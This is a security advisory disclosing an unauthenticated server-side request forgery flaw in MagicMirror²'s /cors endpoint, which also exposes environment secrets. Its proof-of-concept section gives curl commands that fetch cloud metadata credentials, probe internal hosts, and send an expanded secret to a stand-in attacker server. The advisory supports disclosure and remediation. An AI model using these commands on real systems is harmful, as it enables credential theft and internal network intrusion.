GHSA-ph6f-2cvq-79hq

Summary

An unauthenticated Server-Side Request Forgery (SSRF) vulnerability in the /cors endpoint allows any remote attacker to force the MagicMirror² server to perform arbitrary HTTP requests to internal networks, cloud metadata services, and localhost services. The endpoint also expands environment variable placeholders (**VAR_NAME**), enabling exfiltration of server-side secrets.

Details

The /cors endpoint in js/server_functions.js (function cors(), lines 37-78) acts as an open HTTP proxy with no authentication and no URL validation. Any user-supplied URL is fetched server-side via fetch() and the full response is returned to the caller.

Additionally, the replaceSecretPlaceholder() function (lines 21-25) expands any **VARIABLE_NAME** pattern in the URL with the corresponding process.env value before the request is made, allowing an attacker to exfiltrate environment variables (e.g. API keys, tokens, database credentials).

Vulnerable code path:

GET /cors?url=<attacker-controlled-url>
  → replaceSecretPlaceholder(url)     // expands **ENV_VAR** → process.env.ENV_VAR
  → fetch(url)                        // no validation, no blocklist
  → response returned to attacker     // full body, status, headers

Key issues: - No authentication required - No URL validation or blocklist for private/reserved IP ranges - No restriction on URL scheme or destination - Environment variable expansion in URL before fetch

PoC

Prerequisites: a running MagicMirror² instance accessible on the network (default: http://<host>:8080).

1. Basic SSRF — access cloud metadata (AWS IMDSv1):

curl "http://<target>:8080/cors?url=http://169.254.169.254/latest/meta-data/"

If the server runs on AWS EC2 without IMDSv2 enforcement, this returns instance metadata including IAM role credentials.

2. Internal network scanning:

curl "http://<target>:8080/cors?url=http://192.168.1.1/"
curl "http://<target>:8080/cors?url=http://127.0.0.1:3000/"

The attacker can probe internal services by observing response status codes and timing.

3. Environment variable exfiltration:

curl "http://<target>:8080/cors?url=http://<attacker-server>/?leak=**SECRET_API_KEY**"

The server expands **SECRET_API_KEY** to the value of process.env.SECRET_API_KEY before making the request, sending the secret to the attacker-controlled server as a query parameter.

Impact

• Cloud deployments (AWS/GCP/Azure): full compromise of cloud instance credentials via metadata service (169.254.169.254), potentially leading to lateral movement within the cloud account
• Internal network access: the server becomes a proxy to scan and interact with services on internal networks that are not directly reachable by the attacker
• Secret exfiltration: environment variables containing API keys, database credentials, or other sensitive configuration are directly readable
• Affected users: anyone running MagicMirror² exposed to an untrusted network (including LAN). The /cors endpoint requires no authentication, so any host that can reach the MagicMirror HTTP port can exploit this vulnerability